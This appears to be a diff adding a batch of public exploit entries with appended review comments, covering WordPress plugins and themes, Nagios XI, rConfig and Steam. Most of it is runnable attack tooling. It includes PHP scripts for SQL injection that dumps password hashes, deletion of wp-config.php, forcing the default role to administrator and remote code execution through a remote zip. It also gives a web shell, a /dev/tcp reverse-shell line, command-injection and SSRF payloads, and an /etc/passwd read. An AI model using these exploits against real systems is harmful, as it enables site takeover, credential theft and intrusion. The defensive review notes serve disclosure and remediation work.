* Exploit Titie: WP PRO Advertising System - All In One Ad Manager Exploit
* Google Dork:
* Exploit Author: wp0Day.com <contact@wp0day.com>
* Vendor Homepage: http://wordpress-advertising.com/
* Software Link: http://codecanyon.net/item/wp-pro-advertising-system-all-in-one-ad-manager/269693
* Version: 4.6.18
* Tested on: Debian 8, PHP 5.6.17-3
* Type: SQLi, Unserialize, File Delete.
* Time line: Found [06-May-2016], Vendor notified [06-May-2016], Vendor fixed: [???], [RD:1464914936]
*/
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
$options = getopt("t:m:f:c:u:p:s:",array('tor:'));
print_r($options);
$options = validateInput($options);
if (!$options){
showHelp();
}
if ($options['tor'] === true)
{
echo " ### USING TOR ###\n";
echo "Setting TOR Proxy...\n";
$curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
$curl->addOption(CURLOPT_PROXYTYPE,7);
echo "Checking IPv4 Address\n";
$curl->get('https://dynamicdns.park-your-domain.com/getip');
echo "Got IP : ".$curl->getResponse()."\n";
echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
$answer = fgets(fopen ("php://stdin","r"));
if(trim($answer) != 'wololo'){
die("Aborting!\n");
}
echo "OK...\n";
}
class CPDF_Adapter{
private $_image_cache;
public function set_file($file){
$this->_image_cache = array($file);
}
}
function logIn(){
global $curl, $options;
file_put_contents('cookies.txt',"\n");
$curl->setCookieFile('cookies.txt');
$curl->get($options['t']);
$data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
$curl->post($options['t'].'/wp-login.php', $data);
$status = $curl->getTransferInfo('http_code');
if ($status !== 302){
echo "Login probably failed, aborting...\n";
echo "Login response saved to login.html.\n";
die();
}
file_put_contents('login.html',$curl->getResponse());
}
function exploit(){
global $curl, $options;
if ($options['m'] == 'd'){
echo "Delete mode\n";
$pay_load_obj = new CPDF_Adapter();
$pay_load_obj->set_file('../../../../../../wp-config.php', '../../../../../../wp-config.php' );
$pay_load = base64_encode(serialize(array($pay_load_obj)));
$data = array('stats_pdf'=>'1', 'data'=>$pay_load);
$curl->post($options['t'].'?'.http_build_query($data));
$resp = $curl->getResponse();
echo $resp;
} else {
echo "SQLi mode \n";
echo "Trying a longin...\n";
logIn();
echo "Running SQL in Inject mode: ".$options['s']."\n";
$pay_load = array('action'=>'load_stats', 'group'=>'1=1 UNION ALL SELECT ('.$options['s'].') LIMIT 1,1# ', 'group_id'=>'1', 'rid'=>1);
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $pay_load);
$resp = $curl->getResponse();
//Grab the output
if (preg_match('~<div class="am_data">(.*?)(?:</div)~', $resp, $mat)){
if (isset($mat[1])){
echo "Response:\n".$mat[1]."\n";
die("Done\n");
}
}
echo "Failed getting SQLi response, response saved to resp.html\n";
file_put_contents('resp.html', $resp);
}
}
exploit();
function validateInput($options){
if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
return false;
}
if (!preg_match('~/$~',$options['t'])){
$options['t'] = $options['t'].'/';
}
if (!isset($options['m']) || !in_array($options['m'], array('d','s') ) ){
return false;
}
if ($options['m'] == 's' && (!isset($options['u']) || !isset($options['p']) || !isset($options['s'])) ){
return false;
}
$options['tor'] = isset($options['tor']);
return $options;
}
function showHelp(){
global $argv;
$help = <<<EOD
WP PRO Advertising System - All In One Ad Manager Expoit Pack
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USER] -p [password] -m [MODE] -s [SQL]
*** In order to use the SQLi part you need an advertiser login **
[TARGET_URL] http://localhost/wordpress/
[MODE] d - Delete wp-config.php
s - SQL Injection
[TOR] Use tor network? (Connects to 127.0.0.1:9150)
Note: In SQLi mode, you can't use ' or ", and you are in a subselect.
To get all users and passwords you would do :
SELECT concat(user_login,0x3a,user_pass,0x3a,user_email) FROM wp_users LIMIT 1
SELECT concat(user_login,0x3a,user_pass) FROM wp_users LIMIT 1,1
SELECT concat(user_login,0x3a,user_pass) FROM wp_users LIMIT 2,1
Examples:
php $argv[0] -t http://localhost/wordpress --tor=yes -u user -p password -m d // Try to delete some files
php $argv[0] -t http://localhost/wordpress -u user -p password -m s -s 'SELECT concat(user_login,0x3a,user_pass,0x3a,user_email) FROM wp_users LIMIT 1'
Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
echo $help."\n\n";
die();
}
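Review bot: the delete mode passes two arguments to CPDF_Adapter::set_file, which is declared with one; PHP silently drops the extra argument, but the call should match the signature. "Vendor fixed: [???]" means this was published with unknown fix status, so the header should at least record the notification date's outcome; and since the Type line lists SQLi, Unserialize and File Delete, the write-up should name the two weak spots the PoC shows rather than leaving the reader to infer them from the code: the "group" value of the load_stats action is concatenated into SQL (fix: $wpdb->prepare with placeholders), and the "data" parameter of the stats_pdf request is base64-decoded and unserialized from user input (fix: do not unserialize request data; use a JSON structure and validate it). Typos on the hunk lines: "Exploit Titie", "Expoit", "longin".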

platforms/php/webapps/39894.php Executable file

@ -0,0 +1,125 @@
<?php
/**
* Exploit Title: Newspaper WP Theme Expoit
* Google Dork:
* Exploit Author: wp0Day.com <contact@wp0day.com>
* Vendor Homepage: http://tagdiv.com/newspaper/
* Software Link: http://themeforest.net/item/newspaper/5489609
* Version: 6.7.1
* Tested on: Debian 8, PHP 5.6.17-3
* Type: WP Options Overwrite, Possible more
* Time line: Found [23-APR-2016], Vendor notified [23-APR-2016], Vendor fixed: [27-APR-2016], [RD:1]
*/
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
$options = getopt("t:m:u:p:f:c:",array('tor:'));
print_r($options);
$options = validateInput($options);
if (!$options){
showHelp();
}
if ($options['tor'] === true)
{
echo " ### USING TOR ###\n";
echo "Setting TOR Proxy...\n";
$curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
$curl->addOption(CURLOPT_PROXYTYPE,7);
echo "Checking IPv4 Address\n";
$curl->get('https://dynamicdns.park-your-domain.com/getip');
echo "Got IP : ".$curl->getResponse()."\n";
echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
$answer = fgets(fopen ("php://stdin","r"));
if(trim($answer) != 'wololo'){
die("Aborting!\n");
}
echo "OK...\n";
}
function exploit(){
global $curl, $options;
switch ($options['m']){
case "admin_on":
echo "Setting default role to Administrator \n";
$data = array('action'=>'td_ajax_update_panel', 'wp_option[default_role]'=>'administrator');
break;
case "admin_off":
echo "Setting default role to Subscriber \n";
$data = array('action'=>'td_ajax_update_panel', 'wp_option[default_role]'=>'subscriber');
break;
case "reg_on":
echo "Enabling registrations\n";
$data = array('action'=>'td_ajax_update_panel', 'wp_option[users_can_register]'=>'1');
break;
case "reg_on":
echo "Disabling registrations\n";
$data = array('action'=>'td_ajax_update_panel', 'wp_option[users_can_register]'=>'0');
break;
}
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
echo "Response: ". $resp."\n";
}
exploit();
function validateInput($options){
if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
return false;
}
if (!preg_match('~/$~',$options['t'])){
$options['t'] = $options['t'].'/';
}
if (!isset($options['m']) || !in_array($options['m'], array('admin_on','reg_on','admin_off','reg_off') ) ){
return false;
}
$options['tor'] = isset($options['tor']);
return $options;
}
function showHelp(){
global $argv;
$help = <<<EOD
Newspaper WP Theme Exploit
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -m [MODE]
[TARGET_URL] http://localhost/wordpress/
[MODE] admin_on - Default admin level on reg. admin_off - Default subscriber on reg.
reg_on - Turns on user registration. reg_off - Turns off user registrations.
Trun on registrations, set default level to admin, register a user on the webiste,
turn off admin mode, turn off user registrations.
Examples:
php $argv[0] -t http://localhost/wordpress --tor=yes -m admin_on
[Register a new user as Admin]
php $argv[0] -t http://localhost/wordpress --tor=yes -m admin_off
Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
echo $help."\n\n";
die();
}
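Review bot: the switch in exploit() carries two case "reg_on": labels; the second one (the branch that echoes "Disabling registrations" and sets users_can_register to '0') should read case "reg_off":. As written no label matches "reg_off", so $data is never assigned and the following $curl->post() is sent with an empty body, even though validateInput() accepts reg_off and the help text documents it. The header comment also misspells "Exploit" as "Expoit". Read defensively, the hunk shows that admin-ajax.php?action=td_ajax_update_panel is reached with no prior login and writes whatever wp_option[...] key is posted; the theme-side fix is a capability check and nonce on that handler, and a site owner can flag POSTs to admin-ajax.php carrying action=td_ajax_update_panel from requests without a WordPress auth cookie, or unexpected changes to the default_role and users_can_register options.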

platforms/php/webapps/39895.php Executable file
@ -0,0 +1,152 @@
<?php
/**
* Exploit Title: Uncode WP Theme RCE Expoit
* Google Dork:
* Exploit Author: wp0Day.com <contact@wp0day.com>
* Vendor Homepage:
* Software Link: http://themeforest.net/item/uncode-creative-multiuse-wordpress-theme/13373220
* Version: 1.3.0 possible 1.3.1
* Tested on: Debian 8, PHP 5.6.17-3
* Type: RCE, Arbirary file UPLOAD, (Low Authenticated )
* Time line: Found [24-APR-2016], Vendor notified [24-APR-2016], Vendor fixed: [27-APR-2016], [RD:1464134400]
*/
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
$options = getopt("t:u:p:f:",array('tor:'));
print_r($options);
$options = validateInput($options);
if (!$options){
showHelp();
}
if ($options['tor'] === true)
{
echo " ### USING TOR ###\n";
echo "Setting TOR Proxy...\n";
$curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
$curl->addOption(CURLOPT_PROXYTYPE,7);
echo "Checking IPv4 Address\n";
$curl->get('https://dynamicdns.park-your-domain.com/getip');
echo "Got IP : ".$curl->getResponse()."\n";
echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
$answer = fgets(fopen ("php://stdin","r"));
if(trim($answer) != 'wololo'){
die("Aborting!\n");
}
echo "OK...\n";
}
function logIn(){
global $curl, $options;
file_put_contents('cookies.txt',"\n");
$curl->setCookieFile('cookies.txt');
$curl->get($options['t']);
$data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
$curl->post($options['t'].'/wp-login.php', $data);
$status = $curl->getTransferInfo('http_code');
if ($status !== 302){
echo "Login probably failed, aborting...\n";
echo "Login response saved to login.html.\n";
die();
}
file_put_contents('login.html',$curl->getResponse());
}
function exploit(){
global $curl, $options;
echo "Generateing payload.\n";
$data = array('action'=>'uncodefont_download_font', 'font_url'=>$options['f']);
echo "Sending payload\n";
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
echo "Eco response: ".$resp."\n";
$resp = json_decode($resp,true);
if ($resp['success'] === 'Font downloaded and extracted successfully.'){
echo "Response ok, calling RCE\n";
$file_path = parse_url($options['f']);
$remote_file_info = pathinfo($file_path['path']);
$zip_file_name = $remote_file_info['basename'];
$zip_file_name_php = str_replace('.zip', '.php', $zip_file_name);
$url = $options['t'].'wp-content/uploads/uncode-fonts/'.$zip_file_name.'/'.$zip_file_name_php;
echo 'Url: '. $url."\n";
//POC Test mode
if ($file_path['host'] == 'wp0day.com'){
echo "Exploit test mode on\n";
$rnd = rand();
echo "Rand $rnd, MD5: ".md5($rnd)."\n";
$url = $url . '?poc='.$rnd;
}
$curl->get($url);
echo "RCE Response:";
echo $curl->getResponse()."\n\n";
}
}
logIn();
exploit();
function validateInput($options){
if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
return false;
}
if ( !isset($options['u']) ){
return false;
}
if ( !isset($options['p']) ){
return false;
}
if ( !isset($options['f']) ){
return false;
}
if (!preg_match('~/$~',$options['t'])){
$options['t'] = $options['t'].'/';
}
$options['tor'] = isset($options['tor']);
return $options;
}
function showHelp(){
global $argv;
$help = <<<EOD
Uncode WP Theme RCE Expoit
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USERNAME] -p [PASSWORD] -f [URL]
*** You need to have a valid login (customer or subscriber will do) in order to use this "exploit" **
[TARGET_URL] http://localhost/wordpress/
[URL] It must be ZIP file. It gets unzipped into /wp-content/uploads/uncode-fonts/[some.zip]/files folder
Example: rce.php -> zip -> rce.zip -> http://evil.com/rce.zip -> /wp-content/uploads/uncode-fonts/rce.zip/rce.php
Examples:
php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -f http://wp0day.com/res/php/poc.zip
Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
echo $help."\n\n";
die();
}
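Review bot: in logIn() the file_put_contents('login.html', ...) call sits after the die() in the failed-login branch, so the message "Login response saved to login.html" is never true; the file is written only when the login succeeded. Move the write above the status check. Two smaller points: validateInput() appends a trailing slash to $options['t'], yet logIn() and exploit() then concatenate '/wp-login.php' and '/wp-admin/admin-ajax.php', giving a double slash, while the line building $url correctly omits it; and json_decode() returns null on a non-JSON body, so $resp['success'] should be guarded with isset(). For defenders, what the hunk documents is that admin-ajax.php?action=uncodefont_download_font fetches a remote archive named in font_url and extracts it under wp-content/uploads/uncode-fonts/<archive name>/ for any authenticated account, after which a .php entry is served from that directory; the relevant hardening is a manage_options capability check plus nonce on the handler, rejecting archive entries that are not font files, and a web server rule denying PHP execution under wp-content/uploads.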

platforms/php/webapps/39896.txt Executable file
@ -0,0 +1,29 @@
# Exploit Title: Double Opt-In for Download 2.0.9 Sql Injection
# Date: 06-06-2016
# Software Link: https://wordpress.org/plugins/double-opt-in-for-download/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
1. Description
`$_POST['id']` is not escaped.
`populate_download_edit_form()` is accessible for every registered user.
http://security.szurek.pl/double-opt-in-for-download-209-sql-injection.html
2. Proof of Concept
Login as regular user.
<form name="xss" action="http://wordpress-url/wp-admin/admin-ajax.php?action=populate_download_edit_form" method="post">
<input type="text" name="id" value="0 UNION SELECT 1, 2, 4, 5, 6, 7, user_pass FROM wp_users WHERE ID=1">
<input type="submit" value="Send">
</form>
3. Solution:
Update to version 2.1.0
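Review bot: the proof-of-concept form is named "xss" although the issue described is SQL injection through the id parameter; rename it so the PoC matches the title. The Description would also benefit from stating the expected fix rather than only a version number: the id value should pass through $wpdb->prepare() (or be cast to an integer), and populate_download_edit_form() should check a capability such as manage_options before running, since the hunk notes it is reachable by every registered user. On the detection side, an admin-ajax.php request with action=populate_download_edit_form whose id value is non-numeric is a reliable signal for this issue.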

platforms/php/webapps/39898.txt Executable file
@ -0,0 +1,39 @@
Title
===================
rConfig, the open source network device configuration management tool, Vulnerable to Local File Inclusion
Summary
===================
rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/crud/downloadFile.php. downloadFile.php allows authenticated users to download any file on the server.
Affected Products
===================
rConfig 3.1.1 and earlier
CVE
===================
N/A
Details
===================
rConfig, the open source network device configuration management tool, is vulnerable to local file inclusion in /lib/crud/downloadFile.php. downloadFile.php allows authenticated users to download any file on the server. This is because downloadFile.php does not check the download_file parameter before it uses it. It merely opens and sends the file in the parameter to the user. As long as the account running the web server has access to it, rConfig will open it and send it.
Verification of Vulnerability
===================
The following steps can be carried out in duplicating this vulnerability.
Step 1:
Enter the following into your browser address bar:
http://<SERVER>/lib/crud/downloadFile.php?download_file=/etc/passwd
Step 2:
Confirm that the passwd file is valid
Impact
===================
Information Disclosure. User privileges and unauthorized access to the system.
Credits
===================
Gregory Pickett (@shogun7273), Hellfire Security
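Review bot: the advisory is titled "Local File Inclusion", but what the Details section describes (downloadFile.php opens the file named in download_file and sends it to the user) is an arbitrary file read through a path parameter, not inclusion of the file into PHP execution; title and summary should say arbitrary file download or path traversal. The advisory also lacks Solution and Timeline sections: it should state whether the vendor was notified and which version, if any, fixes the issue, and give an interim mitigation, namely resolving download_file with realpath() and rejecting anything outside the intended download directory (or, better, accepting only an identifier that the script maps to a file server-side). Because the issue requires authentication, web access logs showing downloadFile.php requests whose download_file value contains ".." or an absolute system path are a direct detection.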

platforms/php/webapps/39899.txt Executable file
@ -0,0 +1,268 @@
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Nagios XI Multiple Vulnerabilities
Affected versions: Nagios XI <= 5.2.7
PDF:
http://www.security-assessment.com/files/documents/advisory/NagiosXI-Advisory.pdf
+-----------+
|Description|
+-----------+
The Nagios XI application is affected by multiple security
vulnerabilities, including unauthenticated SQL injection and
authentication bypass, arbitrary code execution via command injection,
privilege escalation, server-side request forgery and account hijacking.
These vulnerabilities can be chained together to obtain unauthenticated
remote code execution as the root user.
+------------+
|Exploitation|
+------------+
==SQL Injection==
The host and service GET parameters in the nagiosim.php page are
vulnerable to SQL injection via error-based payloads. An attacker can
exploit this vulnerability to retrieve sensitive information from the
applications MySQL database such as the administrative users password
hash (unsalted MD5) or the token used to authenticate to the Nagios XI
REST API. This security issue is aggravated by the fact that an attacker
can directly browse to the vulnerable page and exploit the vulnerability
without providing a valid session cookie.
[POC - DUMP ADMIN API TOKEN]
GET
/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service='+AND+
(SELECT+1+FROM(SELECT+COUNT(*),CONCAT('|APIKEY|',(SELECT+MID((IFNULL(CAST(backend_ticket+AS
+CHAR),0x20)),1,54)+FROM+xi_users+WHERE+user_id%3d1+LIMIT+0,1),'|APIKEY|',FLOOR(RAND(0)*2))
x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)+OR+' HTTP/1.1
The API token can be reused to bypass authentication either by creating
a user via the REST API or through the Rapid Response functionality as
shown below.
[POC- BYPASS AUTHENTICATION THROUGH RAPID RESPONSE FUNCTIONALITY]
// uid == <user_id>-<object_id>-<MD5(api token)>, object id value
doesn't matter
GET /nagiosxi/rr.php?uid=1-b-<hash> HTTP/1.1
==Command Injection==
Multiple command injection vulnerabilities exist in the Nagios XI web
interface due to unescaped user input being passed to shell functions as
an argument. This issues can be exploited to inject arbitrary shell
commands and obtain remote code execution in the context of the 'apache'
user.
URL => GET
/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=update&token=<api
token>&incident_id=<valid incident id>&title=<PAYLOAD>&status=<any value>
PARAMETER => title
POC PAYLOAD => title'; touch /tmp/FILE; echo '
URL => GET
/nagiosxi/includes/components/perfdata/graphApi.php?host=<any monitored
host IP>&start=<PAYLOAD>&end=<PAYLOAD>
PARAMETERS => start, end
POC PAYLOAD => 1; touch /tmp/FILE;
==Privilege Escalation==
The Nagios XI default sudoers configuration can be abused to elevate
privileges to root due to an insecure implementation of the
applications component upload functionality. The apache user can run
the getprofile.sh script with root privileges without being prompted for
a password. The getprofile.sh script is part of the Profile component
along with the following files:
- profile.php, the PHP script that outputs the system information.
- profile.inc.php, a PHP include file with required functionality for
profile.php.
An attacker can backdoor the profile.php file with a function to execute
arbitrary shell commands (e.g. <?php system($_GET['cmd']); ?> ), replace
the getprofile.sh file with a malicious payload (e.g. “#!/bin/bash bash
i >& /dev/tcp/<IP>/<PORT> 0>&1”) and finally create a profile.zip
archive containing the malicious component files. Once uploaded, the
application will unzip the component archive and overwrite the existing
profile directory and its files, including getprofile.sh.
[POC - MALICIOUS 'profile.zip' COMPONENT ARCHIVE]
[POC - PRIVILEGE ESCALATION EXPLOITATION]
GET /nagiosxi/includes/components/profile/profile.php?cmd=sudo
./getprofile.sh
The default Profile component archive can be downloaded at the following
link:
https://assets.nagios.com/downloads/nagiosxi/components/profile.zip
==Server-Side Request Forgery==
Multiple server-side request forgery vulnerabilities exist in the Nagios
XI application. An attacker can provide arbitrary data to curl_exec
calls to port scan internal services listening on localhost, read files
on the Nagios XI server file system or send data to other hosts in the
same internal network where the Nagios XI server is deployed.
// the application filter the string 'file://' can be bypassed by
converting the handler to uppercase
URL => GET /nagiosxi/ajaxproxy.php?proxyurl=<PAYLOAD>
PARAMETER => proxyurl
POC PAYLOAD => FILE:///<path>/<file>
URL => GET /nagiosxi/backend/?cmd=geturlhtml&url=<PAYLOAD>
PARAMETER => url
POC PAYLOAD => file:///<path>/<file>
==Account Hijacking==
The Nagios XI application is vulnerable to an arbitrary account
hijacking vulnerability due to an insecure implementation of the
password reset functionality. The application does not enforce any
verification to confirm the provided reset token can only be used to
change the login credentials for the specific user for which it was
generated. A limited user can therefore abuse the password reset
functionality to hijack an administrative account by tampering with the
username hidden parameter during the password reset process.
[POC - ACCOUNT HIJACKING 'nagiosadmin']
POST /nagiosxi/login.php?finishresetpass&username=stduser&token-<reset
token> HTTP/1.1
token=<reset
token>&username=nagiosadmin&password1=<PASSWORD>&password2=<PASSWORD>&reset=1
+----------+
| Solution |
+----------+
Upgrade to Nagios XI 5.2.8.
Please note at the time of this writing the privilege escalation
vulnerability is still unpatched. The SSRF vulnerabilities have been
only partially fixed by blacklisting the 'file://' handler, but all the
other SSRF attack vectors are still exploitable. Vendor stated these
vulnerabilities will be likely patched on the next release of the
application as they require authentication and as such are not
considered major security issues.
+------------+
| Timeline |
+------------+
13/05/2016 Initial disclosure to vendor
14/05/2016 Vendor confirms receipt of advisory
25/05/2016 Vendor provides fixes for most of the vulnerabilities
25/05/2016 Enquiry about the status of fixes for the unpatched
vulnerabilities
26/05/2016 Vendor responded with “Since the major issues have been
fixed and the remaining issues I'd like to touch up are only available
if the user is logged in, or logged in as admin, I don't see a reason to
hold onto releasing the advisory.”
2/06/2016 Public disclosure
+------------+
| Additional |
+------------+
Further information is available in the accompanying PDF.
http://www.security-assessment.com/files/documents/advisory/NagiosXI-Advisory.pdf
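Review bot: the Solution section contradicts the paragraph that follows it: it says "Upgrade to Nagios XI 5.2.8" while the next paragraph states the privilege escalation is unpatched and the SSRF only partially fixed, so the upgrade alone does not close what the advisory reports. The section should list interim mitigations for the unfixed items. For the privilege escalation, remove or restrict the sudoers entry that lets the apache user run getprofile.sh without a password and limit component upload to trusted administrators, since the hunk shows the upload overwrites the profile directory including the script that sudo executes. For the SSRF, the hunk itself notes that the 'file://' blacklist is bypassed by changing case, which is the usual failure mode of a blacklist; suggest an allowlist of http and https schemes checked after a case-insensitive parse. The account-hijacking fix should also be named explicitly: the reset token must be bound server-side to the user it was issued for instead of trusting the posted username. Finally, the [POC - MALICIOUS 'profile.zip' COMPONENT ARCHIVE] heading has no body in this copy (the archive data is absent), which is worth noting so readers do not look for it.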

@ -0,0 +1,52 @@
# Exploit Title: Valve Steam 3.42.16.13 Local Privilege Escalation
# CVE-ID: CVE-2016-5237
# Date: 5/11/52016
# Exploit Author: gsX
# Contact: gsx0r.sec@gmail.com
# Vendor Homepage: http://www.valvesoftware.com/
# Software Link: http://store.steampowered.com/about/
#Version: File Version 3.42.16.13, Built: Apr 29 2016, Steam API: v017, Steam package versions: 1461972496
# Tested on: Windows 7 Professional x64 fully updated.
1. Description:
The Steam directory located at C:\Program Files (x86)\Steam implement weak
file permissions
and allow anyone in the BUILTIN\Users windows group to modify any file in
the Steam directory and any of its child files and folders.
Since Steam is a startup application by default this makes it particularly
easy to achieve lateral/vertical privilege escalation and achieve code
execution against any user running the application.
2. Proof
C:\Program Files (x86)>icacls Steam
Steam BUILTIN\Users:(F)
BUILTIN\Users:(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
3. Exploit:
Simply backdoor/replace Steam.exe or any other related exe's/dll's with
the code you want to
run.
I would like to note that I contacted Valve on several occasions
and gave them plenty of time to reply/fix the issue before releasing this
entry.
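Review bot: the Date field reads "5/11/52016", which is not a valid date and should be corrected rather than left for readers to guess. The Description claims "lateral/vertical privilege escalation", but the icacls output only supports that members of BUILTIN\Users can write to the Steam directory, so replaced code runs as whichever user launches Steam; the advisory should say so and note that reaching an administrator requires an administrator to run Steam on the same machine. The output does show the defect precisely: the two BUILTIN\Users entries with (F) and (OI)(CI)(IO)(F) are explicit (no (I) flag), while the inherited Users entries grant only RX. Suggest adding a remediation line, namely removing the explicit Users full-control entries (icacls /remove:g) so only the inherited read/execute entries remain, and, for detection, auditing Program Files subdirectories for non-inherited ACEs that grant Users full control.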